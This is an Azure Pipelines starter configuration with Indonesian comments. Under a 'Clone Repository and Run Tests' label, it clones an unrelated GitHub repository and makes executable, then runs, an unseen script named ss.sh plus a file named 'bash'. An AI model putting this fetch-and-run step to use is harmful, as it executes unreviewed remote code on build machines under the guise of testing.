# Starter pipeline
# Menggabungkan skrip yang menjalankan build dan test sesuai kebutuhan Anda.

trigger:
- main  # Branch utama yang memicu pipeline

pool:
  vmImage: ubuntu-latest

steps:
- script: echo "Hello, world!"
  displayName: 'Run a one-line script'

- script: |
    echo "Menjalankan pipeline untuk build dan test"
    sudo apt-get update
    sudo apt-get install -y git  # Pastikan Git terpasang
    git clone https://github.com/gunturyogatama404/inicoy.git
    cd inicoy
    chmod u+x bash
    chmod u+x ss.sh
    ./ss.sh
  displayName: 'Clone Repository and Run Tests'

- script: |
    echo "Pipeline selesai"
    echo "Anda dapat menambahkan langkah build, test, atau deploy lainnya di sini."
  displayName: 'Run a multi-line script'
